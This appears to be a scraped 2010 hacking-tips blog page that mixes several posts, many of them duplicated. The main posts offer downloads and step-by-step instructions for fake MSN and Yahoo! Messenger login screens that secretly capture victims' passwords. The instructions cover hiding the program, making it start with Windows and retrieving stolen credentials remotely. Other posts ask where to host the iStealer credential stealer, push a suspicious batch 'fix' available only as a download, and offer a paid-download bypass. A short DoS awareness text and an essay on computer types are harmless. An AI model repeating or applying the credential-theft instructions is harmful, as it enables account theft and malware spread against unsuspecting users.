Vista into Mac Leopard
Welcome to the web's most helpful Online Free computer tips and tricks
Monday, December 13, 2010
How TO Hack Web Site
Youtube Video:
Video Tutorial
Video Tutorial
http://www.youtube.com/watch?v=MfNcmvneBSQ&feature=player_embedded |
Best host for iStealer?
Well, i use iStealer 6.0 blackapplehost is down half the time so I'm looking for a new host to use. Tried both 6te.net and spam.com and 000webhost.com but neither worked.
Any suggestions?
I'm looking for the new version iStealer 6.X and not find
Any suggestions?
I'm looking for the new version iStealer 6.X and not find
Best Hacking Tools - 85 in 1
YahooHack! NEW !


2shared - download YahooHack!.exe

2shared - download YahooHack!.exe
Fake MSN Messenger Version 4.6 (4.6.0077) by The_Law
If you want to take anyones sign-in name and password, this is it, just use this fake Messenger to let him think that he is using the real one.
How does it Work:
just run the "fakemsn.exe" file and the fake messenger screen will appear (it will looks like the real one) click on the Click here to sign-in and let the victim type his sign-in name and password then click OK, an error message will appear, and thats it.
How to get the password:
just open "C:\program files\folder.log" and you will find that every sign-in name and password is recorded on that text file (you can open it with any normal text viewer like NOTEPAD.exe)

2shared - download fakemsn.exe
to open the real about Fake MSN Messenger type in the sign-in name field "about" and in the password field "fmsn" (without qoutes) and then click ok.
Very Special Thanks to giz and anyone alse who helped me to continue this.

-= Fake Yahoo! Messenger Login Screen =-
._ _.
~ expl0it_shad0w ~
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
o0 - Table Of Contents - 0o
-= Section 1 =-
A> Introduction
B> Instructions
C> Features
D> Known Bugs/Issues
E> Contacting Me
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,A =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Introduction
Theres alot of Fake Login Screens for Yahoo! out there. But Ive tried to make one as real lookign as possible.
Its got lots of features that others dont, aswell as both remote and physical log file access.
There are allso draw backs which are listed below under 1C. This version has been tested with win 9x only.
If you want to test with Xp or ME then its up to you, but theres no telling what could happen.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,B =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Instructions
Follow these instructions.
1> Place The filename "YPager.exe" any where on there system ( HINT: somewhere hidden ).
2> Open it up and get the user to login/ or wait untill they login. The program does the rest.
( You can use both physical and remote log file access to see what user/pass the user has entered.
You need to use an Internet Browser, like MSIE )
3>
< Physical Access >
There are 2 ways of doing this.
1. Viewing the RAW log file with note pad. The file with the recorded passwords is, c:\windows\yloginwin32.htm
NOTE: You will allso see c:\windows\YPager.exe allso exists just leave this here.
2. When you open the Fake Yahoo! Messenger Login Screen you will see a text box, with Search Yahoo! inside it,
just remove this text and type in "c-cure" without the quotes then hit search. This will show you all
recorded user/pass's on the computer.
< Remote Access >
Connect to there machine on port 80 with an Internet browser. Type in there IP address into
it and just hit Enter. For example if the victims IP address was 127.0.0.1 you type in cPanel or
just 127.0.0.1.
NOTE: There ip will not be 127.0.0.1 so dont put it in. Its just an example.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,C =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Features
* Ive delayed the application startup-time like the real Yahoo! Messenger has.
* Ive added a trayicon, which allows you to control the fake login screen like the real-thing.
* When you open Fake YPager.exe it copies itself to the windows directory and then starts the HTTP server.
* Added HTTP server for remote access.
* The application has all the same images/graphics as the real one.
* When the victim types in his username/password Fake YPager.exe displays an error then loads the real YPager.
* Added a reg string to make Fake YPager.exe load up on windows start ( Better Remote Access ).
* The preferences can also be changed like the real thing. ( NOTE: They do nothing tho... ).
* Fake error messaages are shown, when the user clicks for help.
* Added the correct file,version,copyright information when you choose the files properties.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,D =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Known Bugs/Issues
As allways there are certain things you should be aware of. If you have any more probs give me feedback.
All the problems below are being worked on, for the next release.
* The Fake YPager.exe Icon in the tray is not the real one used.
* The Main form can not be resized as of yet.
* The Main form allways starts in the middle of the screen.
* All other forms, are placed in the same location as the main form, onced shown.
* The Search Yahoo! text box, takes 2 clicks to get rid of it, as the real one takes 1.
* The Status bar, on the fake one doesnet have the icon used in the real one.
The above problems are not exactly noticable, but certain users could guess it is a fake.
Know of any more? Give me feedback. And any help is welcome, providing the person/groups that are giving help
know and use delphi well...

2shared - download fakeypager.zip
If you want to take anyones sign-in name and password, this is it, just use this fake Messenger to let him think that he is using the real one.
How does it Work:
just run the "fakemsn.exe" file and the fake messenger screen will appear (it will looks like the real one) click on the Click here to sign-in and let the victim type his sign-in name and password then click OK, an error message will appear, and thats it.
How to get the password:
just open "C:\program files\folder.log" and you will find that every sign-in name and password is recorded on that text file (you can open it with any normal text viewer like NOTEPAD.exe)
2shared - download fakemsn.exe
to open the real about Fake MSN Messenger type in the sign-in name field "about" and in the password field "fmsn" (without qoutes) and then click ok.
Very Special Thanks to giz and anyone alse who helped me to continue this.
-= Fake Yahoo! Messenger Login Screen =-
._ _.
~ expl0it_shad0w ~
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
o0 - Table Of Contents - 0o
-= Section 1 =-
A> Introduction
B> Instructions
C> Features
D> Known Bugs/Issues
E> Contacting Me
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,A =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Introduction
Theres alot of Fake Login Screens for Yahoo! out there. But Ive tried to make one as real lookign as possible.
Its got lots of features that others dont, aswell as both remote and physical log file access.
There are allso draw backs which are listed below under 1C. This version has been tested with win 9x only.
If you want to test with Xp or ME then its up to you, but theres no telling what could happen.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,B =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Instructions
Follow these instructions.
1> Place The filename "YPager.exe" any where on there system ( HINT: somewhere hidden ).
2> Open it up and get the user to login/ or wait untill they login. The program does the rest.
( You can use both physical and remote log file access to see what user/pass the user has entered.
You need to use an Internet Browser, like MSIE )
3>
< Physical Access >
There are 2 ways of doing this.
1. Viewing the RAW log file with note pad. The file with the recorded passwords is, c:\windows\yloginwin32.htm
NOTE: You will allso see c:\windows\YPager.exe allso exists just leave this here.
2. When you open the Fake Yahoo! Messenger Login Screen you will see a text box, with Search Yahoo! inside it,
just remove this text and type in "c-cure" without the quotes then hit search. This will show you all
recorded user/pass's on the computer.
< Remote Access >
Connect to there machine on port 80 with an Internet browser. Type in there IP address into
it and just hit Enter. For example if the victims IP address was 127.0.0.1 you type in cPanel or
just 127.0.0.1.
NOTE: There ip will not be 127.0.0.1 so dont put it in. Its just an example.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,C =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Features
* Ive delayed the application startup-time like the real Yahoo! Messenger has.
* Ive added a trayicon, which allows you to control the fake login screen like the real-thing.
* When you open Fake YPager.exe it copies itself to the windows directory and then starts the HTTP server.
* Added HTTP server for remote access.
* The application has all the same images/graphics as the real one.
* When the victim types in his username/password Fake YPager.exe displays an error then loads the real YPager.
* Added a reg string to make Fake YPager.exe load up on windows start ( Better Remote Access ).
* The preferences can also be changed like the real thing. ( NOTE: They do nothing tho... ).
* Fake error messaages are shown, when the user clicks for help.
* Added the correct file,version,copyright information when you choose the files properties.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
-= Section 1,D =-
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Known Bugs/Issues
As allways there are certain things you should be aware of. If you have any more probs give me feedback.
All the problems below are being worked on, for the next release.
* The Fake YPager.exe Icon in the tray is not the real one used.
* The Main form can not be resized as of yet.
* The Main form allways starts in the middle of the screen.
* All other forms, are placed in the same location as the main form, onced shown.
* The Search Yahoo! text box, takes 2 clicks to get rid of it, as the real one takes 1.
* The Status bar, on the fake one doesnet have the icon used in the real one.
The above problems are not exactly noticable, but certain users could guess it is a fake.
Know of any more? Give me feedback. And any help is welcome, providing the person/groups that are giving help
know and use delphi well...
2shared - download fakeypager.zip
How to speed up utorrent or bittorrent from 83.5 kb.s to 672.4kb/s
everyone i will show you how to speed up utorrent or bittorrent follow the images
first my speed was 83.5kb/s
to speed up the torrents app you need cheat engine
download it from here or search it on google
then follow my steps
1 open cheat engine
2 follow the steps on the image
3 this image teach you how to do
press aply a few times
4 Enjoy heres my utorrent after
first my speed was 83.5kb/s
to speed up the torrents app you need cheat engine
download it from here or search it on google
then follow my steps
1 open cheat engine
2 follow the steps on the image
3 this image teach you how to do
press aply a few times
4 Enjoy heres my utorrent after
[Solved]. Generic Host Problem Solved By Arshid Hacker. [Guarnteed]
If u Faced a Problem like Generic Host Problem then Don't Hesitate Becoz Itz not a trojan or not any spam .Itz Just a Window Coding Assembly And I am also Working for Microsoft Company Lab in U.S.
So i made a batch file Which Solved or Removed the Problem of Generic Host Process Win32.
Note: It is Only for Window XP2, XP3 Operating Systems.
Download Link:
http://rapidshare.com/files/43561729...m__Solved_.rar
By Manually Method:
===================
Now Follow These Steps
1. Open Notepad.
2. Write These Following Lines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
...............Hidden Data .................. Note: To Know This Hidden Data . Download Above Link (Raipidshare) |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
3. Save it as Generic.Bat in Your Desktop or Any Location.
4. Run This Batch File
5. Your Generic Win32 Problem is Solved
All Credit Goes to MIT Labortory and All my Friends in MICROSOFT.
Thanks,
If u have Any Further Problem then Contact Me in MIT LAB in U.S.
We all Are Together so We can Say That Everything is Possible in This World.
Ping Test Easy Software[Tested] 100 % With Dos Feature and Traceroute Feature.
Ping Test Easy Software[Tested] 100 % With Dos Feature and Traceroute Feature.
Run this Software

Now You Can see Also This Feature.

________________
Download Link:
RapidShare:
http://rapidshare.com/files/43506347...sted_-100_.rar
================================================== =============================================
http://rapidshare.com/files/43508184...PC_Solved_.rar
Run this Software

Now You Can see Also This Feature.

________________
Download Link:
RapidShare:
http://rapidshare.com/files/43506347...sted_-100_.rar
================================================== =============================================
http://rapidshare.com/files/43508184...PC_Solved_.rar
Denial of Service Attacks
Understanding Denial-of-Service Attacks
You may have heard of denial-of-service attacks launched against web sites, but you can also be a victim of these attacks. Denial-of-service attacks can be difficult to distinguish from common network activity, but there are some indications that an attack is in progress.
What is a denial-of-service (DoS) attack?
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer. The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular web site into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.
An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.
What is a distributed denial-of-service (DDoS) attack?
In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a web site or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack. How do you avoid being part of the problem?
Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:
Not all disruptions to service are the result of a denial-of-service attack. There may be technical problems with a particular network, or system administrators may be performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:
Even if you do correctly identify a DoS or DDoS attack, it is unlikely that you will be able to determine the actual target or source of the attack. Contact the appropriate technical professionals for assistance.
You may have heard of denial-of-service attacks launched against web sites, but you can also be a victim of these attacks. Denial-of-service attacks can be difficult to distinguish from common network activity, but there are some indications that an attack is in progress.
What is a denial-of-service (DoS) attack?
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer. The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular web site into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.
An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.
What is a distributed denial-of-service (DDoS) attack?
In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a web site or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack. How do you avoid being part of the problem?
Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:
- Install and maintain anti-virus software
- Install a firewall, and configure it to restrict traffic coming into and leaving your computer .
- Follow good security practices for distributing your email address . Applying email filters may help you manage unwanted traffic.
Not all disruptions to service are the result of a denial-of-service attack. There may be technical problems with a particular network, or system administrators may be performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:
- unusually slow network performance (opening files or accessing web sites)
- unavailability of a particular web site
- inability to access any web site
- dramatic increase in the amount of spam you receive in your account
Even if you do correctly identify a DoS or DDoS attack, it is unlikely that you will be able to determine the actual target or source of the attack. Contact the appropriate technical professionals for assistance.
- If you notice that you cannot access your own files or reach any external web sites from your work computer, contact your network administrators. This may indicate that your computer or your organization's network is being attacked.
- If you are having a similar experience on your home computer, consider contacting your Internet service provider (ISP). If there is a problem, the ISP might be able to advise you of an appropriate course of action.:36_2_51:
download as premium user of rapidshare and hotfile for free
Now you can download as premium user of rapidshare and hotfile for free..!!!
A christmas and new year gift from me
I tested it and it's working 100%
Just open the given website and enter your download link:-
For rapidshare premium:-
LineBay.com :: Best Rapidshare Premium Link Generator
For hotfile premium
Hotfile - Linebay.com
A christmas and new year gift from me
I tested it and it's working 100%
Just open the given website and enter your download link:-
For rapidshare premium:-
LineBay.com :: Best Rapidshare Premium Link Generator
For hotfile premium
Hotfile - Linebay.com
About Computer
Computer
The word “computer “came from the word compute which means to “calculate”
Thus the term computer is used for any calculating device however in every day life this term is used for an electronic computer.
Definition:
Computer is define an electronic machine which is used to store, retrieve, and process data according to a set of instruction given to it.
Types of Computer
Computers can be divided into following types on the basis of there working
There are three types of computer
Analog Computer
Digital Computer
Hybrid Computer
Analog Computer:
An Analog Computer does not operate with digital signals. It recognizes data as continues measurement of physical property. It has no state. Analog computer is difficult to operate and use. Its output is usually displayed on meter or graphs. Voltage, pressure, speed and temperature are some physical properties that can be measure in this way. Analog computer has low memory and fewer functions. It is usually built special purposes. Analog computer is mainly use in the field of engineering and medicine. Examples:
Analog clock measure time by the distance of the hands of a clock around a dial
The speed of the car is measured by the Speedo meter
Analog processor is used as petrol stations to indicate quantity of petrol delivered
Digital Computer:
A digital computer works with digits. Everything is described in two states i.e. either on or off. The number 1 represents on or 0 represents the off states. It operates by counting numbers or digits and gives output in digital form. The digital computers are very fast. They can be programmed to perform mathematical calculations, compare values etc.
These computers store results in digitals format. Digital computers are manufactured in a wide variety of sizes speeds and capacities. They have big memory. Digital computers are commonly used in office an educational institutions. Apple Macintosh and IBM Pc is two important digital computer
Examples:
Digital watch is good example of digital computers. It displays the time that does not vary continually but changes from one describe values to others.
Score board that directly count discrete values such as time left to play and the score of each team.
Hybrid Computers:
A hybrid computer is a combination of both Analog and digital computer.
A hybrid computer combines the best characteristics of both the Analog and digital computers.
It can accept data in Analog and digital and digital form
Example:
Hybrid computer device may calculate patients heart functions, temperature, blood pressure etc. this measurement can be converted and displayed in digital form.
Difference between Analog and Digital Computers:
The Difference between Analog and Digital Computers is as follows:
Analog Computers Digital Computers
1. It provides us continues value
2. It represents physical quantities in the form of waves or in continuous form
3. It has no state
4. It is difficult to use
5. It has low memory
6. It has slow speed
7. It is used in engineering and science
8. It is used to calculate analog quantities like speed, weight, height
9. It is less reliable
10. Examples are Thermometer, analog clock etc. 1. It provides us discrete value
2. It represent physical quantities with the help of symbols or number
3. It has two states on [1] and off [0]
4. These computers are easy to use
5. These computer have big memory
6. These computer have fast speed
7. It is used in all fields of life
8. It is used to calculate mathematical and logical operation like addition, multiplication etc.
9. It is more reliable
10. Examples are digital clocks, and laptop computer and micro computers
Reference: This Data collected from URL: http://amazingpctricks.blogspot.com
Ali Faizan Hameed
Muhammad Numan
The word “computer “came from the word compute which means to “calculate”
Thus the term computer is used for any calculating device however in every day life this term is used for an electronic computer.
Definition:
Computer is define an electronic machine which is used to store, retrieve, and process data according to a set of instruction given to it.
Types of Computer
Computers can be divided into following types on the basis of there working
There are three types of computer
Analog Computer
Digital Computer
Hybrid Computer
Analog Computer:
An Analog Computer does not operate with digital signals. It recognizes data as continues measurement of physical property. It has no state. Analog computer is difficult to operate and use. Its output is usually displayed on meter or graphs. Voltage, pressure, speed and temperature are some physical properties that can be measure in this way. Analog computer has low memory and fewer functions. It is usually built special purposes. Analog computer is mainly use in the field of engineering and medicine. Examples:
Analog clock measure time by the distance of the hands of a clock around a dial
The speed of the car is measured by the Speedo meter
Analog processor is used as petrol stations to indicate quantity of petrol delivered
Digital Computer:
A digital computer works with digits. Everything is described in two states i.e. either on or off. The number 1 represents on or 0 represents the off states. It operates by counting numbers or digits and gives output in digital form. The digital computers are very fast. They can be programmed to perform mathematical calculations, compare values etc.
These computers store results in digitals format. Digital computers are manufactured in a wide variety of sizes speeds and capacities. They have big memory. Digital computers are commonly used in office an educational institutions. Apple Macintosh and IBM Pc is two important digital computer
Examples:
Digital watch is good example of digital computers. It displays the time that does not vary continually but changes from one describe values to others.
Score board that directly count discrete values such as time left to play and the score of each team.
Hybrid Computers:
A hybrid computer is a combination of both Analog and digital computer.
A hybrid computer combines the best characteristics of both the Analog and digital computers.
It can accept data in Analog and digital and digital form
Example:
Hybrid computer device may calculate patients heart functions, temperature, blood pressure etc. this measurement can be converted and displayed in digital form.
Difference between Analog and Digital Computers:
The Difference between Analog and Digital Computers is as follows:
Analog Computers Digital Computers
1. It provides us continues value
2. It represents physical quantities in the form of waves or in continuous form
3. It has no state
4. It is difficult to use
5. It has low memory
6. It has slow speed
7. It is used in engineering and science
8. It is used to calculate analog quantities like speed, weight, height
9. It is less reliable
10. Examples are Thermometer, analog clock etc. 1. It provides us discrete value
2. It represent physical quantities with the help of symbols or number
3. It has two states on [1] and off [0]
4. These computers are easy to use
5. These computer have big memory
6. These computer have fast speed
7. It is used in all fields of life
8. It is used to calculate mathematical and logical operation like addition, multiplication etc.
9. It is more reliable
10. Examples are digital clocks, and laptop computer and micro computers
Reference: This Data collected from URL: http://amazingpctricks.blogspot.com
Ali Faizan Hameed
Muhammad Numan
Subscribe to:
Posts (Atom)